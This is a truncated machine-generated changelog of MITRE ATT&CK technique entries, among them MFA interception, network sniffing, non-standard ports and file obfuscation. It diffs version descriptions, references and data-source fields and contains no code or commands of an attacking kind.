x_mitre_data_sourcesProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft RegDelNull July 2016', 'description': 'Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.', 'url': 'https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull'}
x_mitre_data_sourcesWindows Registry: Windows Registry Key Deletion

[T1111] Multi-Factor Authentication Interception

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may target multi-factor authentication (MFA) mect1Adversaries may target multi-factor authentication (MFA) mec
>hanisms, (I.e., smart cards, token generators, etc.) to gain>hanisms, (i.e., smart cards, token generators, etc.) to gain
> access to credentials that can be used to access systems, s> access to credentials that can be used to access systems, s
>ervices, and network resources. Use of MFA is recommended an>ervices, and network resources. Use of MFA is recommended an
>d provides a higher level of security than user names and pa>d provides a higher level of security than usernames and pas
>sswords alone, but organizations should be aware of techniqu>swords alone, but organizations should be aware of technique
>es that could be used to intercept and bypass these security>s that could be used to intercept and bypass these security 
> mechanisms.   If a smart card is used for multi-factor auth>mechanisms.   If a smart card is used for multi-factor authe
>entication, then a keylogger will need to be used to obtain >ntication, then a keylogger will need to be used to obtain t
>the password associated with a smart card during normal use.>he password associated with a smart card during normal use. 
> With both an inserted card and access to the smart card pas>With both an inserted card and access to the smart card pass
>sword, an adversary can connect to a network resource using >word, an adversary can connect to a network resource using t
>the infected system to proxy the authentication with the ins>he infected system to proxy the authentication with the inse
>erted hardware token. (Citation: Mandiant M Trends 2011)  Ad>rted hardware token. (Citation: Mandiant M Trends 2011)  Adv
>versaries may also employ a keylogger to similarly target ot>ersaries may also employ a keylogger to similarly target oth
>her hardware tokens, such as RSA SecurID. Capturing token in>er hardware tokens, such as RSA SecurID. Capturing token inp
>put (including a user's personal identification code) may pr>ut (including a user's personal identification code) may pro
>ovide temporary access (i.e. replay the one-time passcode un>vide temporary access (i.e. replay the one-time passcode unt
>til the next value rollover) as well as possibly enabling ad>il the next value rollover) as well as possibly enabling adv
>versaries to reliably predict future authentication values (>ersaries to reliably predict future authentication values (g
>given access to both the algorithm and any seed values used >iven access to both the algorithm and any seed values used t
>to generate appended temporary codes). (Citation: GCN RSA Ju>o generate appended temporary codes). (Citation: GCN RSA Jun
>ne 2011)  Other methods of MFA may be intercepted and used b>e 2011)  Other methods of MFA may be intercepted and used by
>y an adversary to authenticate. It is common for one-time co> an adversary to authenticate. It is common for one-time cod
>des to be sent via out-of-band communications (email, SMS). >es to be sent via out-of-band communications (email, SMS). I
>If the device and/or service is not secured, then it may be >f the device and/or service is not secured, then it may be v
>vulnerable to interception. Although primarily focused on by>ulnerable to interception. Service providers can also be tar
> cyber criminals, these authentication mechanisms have been >geted: for example, an adversary may compromise an SMS messa
>targeted by advanced actors. (Citation: Operation Emmental)>ging service in order to steal MFA codes sent to users’ phon
 >es.(Citation: Okta Scatter Swine 2022)

Dropped Mitigations:

Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_system_requirements['Smart card Proxy: Use of smart cards for single or multifactor authentication to access to network resources. Attached smart card reader with card inserted.\n\nOut-of-band one-time code: Access to the device, service, or communications to intercept the one-time code.\n\nHardware token: Access to the seed and algorithm of generating one-time codes.']
values_changed
STIX FieldOld valueNew Value
modified2022-10-31 19:47:26.104000+00:002023-04-14 23:26:24.262000+00:00
descriptionAdversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)
external_references[3]['source_name']Operation EmmentalOkta Scatter Swine 2022
external_references[3]['description']Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.
external_references[3]['url']http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdfhttps://sec.okta.com/scatterswine
x_mitre_attack_spec_version3.0.03.1.0
x_mitre_data_sources[0]Process: OS API ExecutionWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: OS API Execution
x_mitre_version2.02.1

[T1070.005] Indicator Removal: Network Share Connection Removal

Current version: 1.1

Version changed from: 1.0 → 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'User']
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:31:01.970000+00:002023-04-13 17:15:56.948000+00:00
x_mitre_data_sources[0]Process: Process CreationUser Account: User Account Authentication
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[3]User Account: User Account AuthenticationCommand: Command Execution
x_mitre_version1.01.1

[T1040] Network Sniffing

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may sniff network traffic to capture informationt1Adversaries may sniff network traffic to capture information
> about an environment, including authentication material pas> about an environment, including authentication material pas
>sed over the network. Network sniffing refers to using the n>sed over the network. Network sniffing refers to using the n
>etwork interface on a system to monitor or capture informati>etwork interface on a system to monitor or capture informati
>on sent over a wired or wireless connection. An adversary ma>on sent over a wired or wireless connection. An adversary ma
>y place a network interface into promiscuous mode to passive>y place a network interface into promiscuous mode to passive
>ly access data in transit over the network, or use span port>ly access data in transit over the network, or use span port
>s to capture a larger amount of data.  Data captured via thi>s to capture a larger amount of data.  Data captured via thi
>s technique may include user credentials, especially those s>s technique may include user credentials, especially those s
>ent over an insecure, unencrypted protocol. Techniques for n>ent over an insecure, unencrypted protocol. Techniques for n
>ame service resolution poisoning, such as [LLMNR/NBT-NS Pois>ame service resolution poisoning, such as [LLMNR/NBT-NS Pois
>oning and SMB Relay](https://attack.mitre.org/techniques/T15>oning and SMB Relay](https://attack.mitre.org/techniques/T15
>57/001), can also be used to capture credentials to websites>57/001), can also be used to capture credentials to websites
>, proxies, and internal systems by redirecting traffic to an>, proxies, and internal systems by redirecting traffic to an
> adversary.  Network sniffing may also reveal configuration > adversary.  Network sniffing may also reveal configuration 
>details, such as running services, version numbers, and othe>details, such as running services, version numbers, and othe
>r network characteristics (e.g. IP addresses, hostnames, VLA>r network characteristics (e.g. IP addresses, hostnames, VLA
>N IDs) necessary for subsequent Lateral Movement and/or Defe>N IDs) necessary for subsequent Lateral Movement and/or Defe
>nse Evasion activities.  In cloud-based environments, advers>nse Evasion activities.  In cloud-based environments, advers
>aries may still be able to use traffic mirroring services to>aries may still be able to use traffic mirroring services to
> sniff network traffic from virtual machines. For example, A> sniff network traffic from virtual machines. For example, A
>WS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap a>WS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap a
>llow users to define specified instances to collect traffic >llow users to define specified instances to collect traffic 
>from and specified targets to send collected traffic to.(Cit>from and specified targets to send collected traffic to.(Cit
>ation: AWS Traffic Mirroring) (Citation: GCP Packet Mirrorin>ation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring
>g) (Citation: Azure Virtual Network TAP) Often, much of this>)(Citation: Azure Virtual Network TAP) Often, much of this t
> traffic will be in cleartext due to the use of TLS terminat>raffic will be in cleartext due to the use of TLS terminatio
>ion at the load balancer level to reduce the strain of encry>n at the load balancer level to reduce the strain of encrypt
>pting and decrypting traffic.(Citation: Rhino Security Labs >ing and decrypting traffic.(Citation: Rhino Security Labs AW
>AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic>S VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mi
> Mirroring) The adversary can then use exfiltration techniqu>rroring) The adversary can then use exfiltration techniques 
>es such as Transfer Data to Cloud Account in order to access>such as Transfer Data to Cloud Account in order to access th
> the sniffed traffic. (Citation: Rhino Security Labs AWS VPC>e sniffed traffic.(Citation: Rhino Security Labs AWS VPC Tra
> Traffic Mirroring)>ffic Mirroring)  On network devices, adversaries may perform
 > network captures using [Network Device CLI](https://attack.
 >mitre.org/techniques/T1059/008) commands such as `monitor ca
 >pture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embed
 >ded_packet_on_software)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referencesSpencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-158
values_changed
STIX FieldOld valueNew Value
modified2022-05-20 17:32:27.146000+00:002023-04-12 23:31:49.085000+00:00
descriptionAdversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring)Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
external_references[2]['source_name']GCP Packet Mirroringcapture_embedded_packet_on_software
external_references[2]['description']Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.
external_references[2]['url']https://cloud.google.com/vpc/docs/packet-mirroringhttps://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html
external_references[3]['source_name']SpecterOps AWS Traffic MirroringGCP Packet Mirroring
external_references[3]['description']Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.
external_references[3]['url']https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512https://cloud.google.com/vpc/docs/packet-mirroring
external_references[4]['source_name']Azure Virtual Network TAPSpecterOps AWS Traffic Mirroring
external_references[4]['description']Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.
external_references[4]['url']https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overviewhttps://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512
external_references[5]['source_name']Rhino Security Labs AWS VPC Traffic MirroringAzure Virtual Network TAP
external_references[5]['description']Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.
external_references[5]['url']https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview
external_references[6]['source_name']capecRhino Security Labs AWS VPC Traffic Mirroring
external_references[6]['url']https://capec.mitre.org/data/definitions/158.htmlhttps://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_detectionDetecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors.Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. For network infrastructure devices, collect AAA logging to monitor for the capture of network traffic.
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_contributorsAustin Clark, @c2defense

[T1095] Non-Application Layer Protocol

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may use a non-application layer protocol for comt1Adversaries may use an OSI non-application layer protocol fo
>munication between host and C2 server or among infected host>r communication between host and C2 server or among infected
>s within a network. The list of possible protocols is extens> hosts within a network. The list of possible protocols is e
>ive.(Citation: Wikipedia OSI) Specific examples include use >xtensive.(Citation: Wikipedia OSI) Specific examples include
>of network layer protocols, such as the Internet Control Mes> use of network layer protocols, such as the Internet Contro
>sage Protocol (ICMP), transport layer protocols, such as the>l Message Protocol (ICMP), transport layer protocols, such a
> User Datagram Protocol (UDP), session layer protocols, such>s the User Datagram Protocol (UDP), session layer protocols,
> as Socket Secure (SOCKS), as well as redirected/tunneled pr> such as Socket Secure (SOCKS), as well as redirected/tunnel
>otocols, such as Serial over LAN (SOL).  ICMP communication >ed protocols, such as Serial over LAN (SOL).  ICMP communica
>between hosts is one example.(Citation: Cisco Synful Knock E>tion between hosts is one example.(Citation: Cisco Synful Kn
>volution) Because ICMP is part of the Internet Protocol Suit>ock Evolution) Because ICMP is part of the Internet Protocol
>e, it is required to be implemented by all IP-compatible hos> Suite, it is required to be implemented by all IP-compatibl
>ts.(Citation: Microsoft ICMP) However, it is not as commonly>e hosts.(Citation: Microsoft ICMP) However, it is not as com
> monitored as other Internet Protocols such as TCP or UDP an>monly monitored as other Internet Protocols such as TCP or U
>d may be used by adversaries to hide communications.>DP and may be used by adversaries to hide communications.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-02-17 15:38:54.578000+00:002023-04-20 19:11:53.499000+00:00
descriptionAdversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
external_references[1]['source_name']Wikipedia OSIUniversity of Birmingham C2
external_references[1]['description']Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url']http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[5]['source_name']University of Birmingham C2Wikipedia OSI
external_references[5]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.
external_references[5]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttp://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDuane Michael

[T1571] Non-Standard Port

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may communicate using a protocol and port paringt1Adversaries may communicate using a protocol and port pairin
> that are typically not associated. For example, HTTPS over >g that are typically not associated. For example, HTTPS over
>port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Cit> port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Ci
>ation: Fortinet Agent Tesla April 2018) as opposed to the tr>tation: Fortinet Agent Tesla April 2018) as opposed to the t
>aditional port 443. Adversaries may make changes to the stan>raditional port 443. Adversaries may make changes to the sta
>dard port used by a protocol to bypass filtering or muddle a>ndard port used by a protocol to bypass filtering or muddle 
>nalysis/parsing of network data.>analysis/parsing of network data.  Adversaries may also make
 > changes to victim systems to abuse non-standard ports. For 
 >example, Registry keys and other configuration settings can 
 >be used to modify protocol and port pairings.(Citation: chan
 >ge_rdp_port_conti)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 22:02:25.221000+00:002023-02-28 22:28:35.202000+00:00
descriptionAdversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data. Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)
external_references[1]['source_name']Symantec Elfin Mar 2019University of Birmingham C2
external_references[1]['description']Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url']https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionagehttps://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name']Fortinet Agent Tesla April 2018Symantec Elfin Mar 2019
external_references[2]['description']Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
external_references[2]['url']https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.htmlhttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
external_references[3]['source_name']University of Birmingham C2change_rdp_port_conti
external_references[3]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved March 1, 2022.
external_references[3]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://twitter.com/TheDFIRReport/status/1498657772254240768
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Fortinet Agent Tesla April 2018', 'description': 'Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.', 'url': 'https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html'}

[T1027] Obfuscated Files or Information

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may attempt to make an executable or file diffict1Adversaries may attempt to make an executable or file diffic
>ult to discover or analyze by encrypting, encoding, or other>ult to discover or analyze by encrypting, encoding, or other
>wise obfuscating its contents on the system or in transit. T>wise obfuscating its contents on the system or in transit. T
>his is common behavior that can be used across different pla>his is common behavior that can be used across different pla
>tforms and the network to evade defenses.   Payloads may be >tforms and the network to evade defenses.   Payloads may be 
>compressed, archived, or encrypted in order to avoid detecti>compressed, archived, or encrypted in order to avoid detecti
>on. These payloads may be used during Initial Access or late>on. These payloads may be used during Initial Access or late
>r to mitigate detection. Sometimes a user's action may be re>r to mitigate detection. Sometimes a user's action may be re
>quired to open and [Deobfuscate/Decode Files or Information]>quired to open and [Deobfuscate/Decode Files or Information]
>(https://attack.mitre.org/techniques/T1140) for [User Execut>(https://attack.mitre.org/techniques/T1140) for [User Execut
>ion](https://attack.mitre.org/techniques/T1204). The user ma>ion](https://attack.mitre.org/techniques/T1204). The user ma
>y also be required to input a password to open a password pr>y also be required to input a password to open a password pr
>otected compressed/encrypted file that was provided by the a>otected compressed/encrypted file that was provided by the a
>dversary. (Citation: Volexity PowerDuke November 2016) Adver>dversary. (Citation: Volexity PowerDuke November 2016) Adver
>saries may also use compressed or archived scripts, such as >saries may also use compressed or archived scripts, such as 
>JavaScript.   Portions of files can also be encoded to hide >JavaScript.   Portions of files can also be encoded to hide 
>the plain-text strings that would otherwise help defenders w>the plain-text strings that would otherwise help defenders w
>ith discovery. (Citation: Linux/Cdorked.A We Live Security A>ith discovery. (Citation: Linux/Cdorked.A We Live Security A
>nalysis) Payloads may also be split into separate, seemingly>nalysis) Payloads may also be split into separate, seemingly
> benign files that only reveal malicious functionality when > benign files that only reveal malicious functionality when 
>reassembled. (Citation: Carbon Black Obfuscation Sept 2016) >reassembled. (Citation: Carbon Black Obfuscation Sept 2016) 
> Adversaries may also obfuscate commands executed from paylo> Adversaries may also abuse [Command Obfuscation](https://at
>ads or directly via a [Command and Scripting Interpreter](ht>tack.mitre.org/techniques/T1027/010) to obscure commands exe
>tps://attack.mitre.org/techniques/T1059). Environment variab>cuted from payloads or directly via [Command and Scripting I
>les, aliases, characters, and other platform/language specif>nterpreter](https://attack.mitre.org/techniques/T1059). Envi
>ic semantics can be used to evade signature based detections>ronment variables, aliases, characters, and other platform/l
> and application control mechanisms. (Citation: FireEye Obfu>anguage specific semantics can be used to evade signature ba
>scation June 2017) (Citation: FireEye Revoke-Obfuscation Jul>sed detections and application control mechanisms. (Citation
>y 2017)(Citation: PaloAlto EncodedCommand March 2017) >: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-O
 >bfuscation July 2017)(Citation: PaloAlto EncodedCommand Marc
 >h 2017) 

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 18:06:32.808000+00:002023-03-30 21:01:43.857000+00:00
descriptionAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting 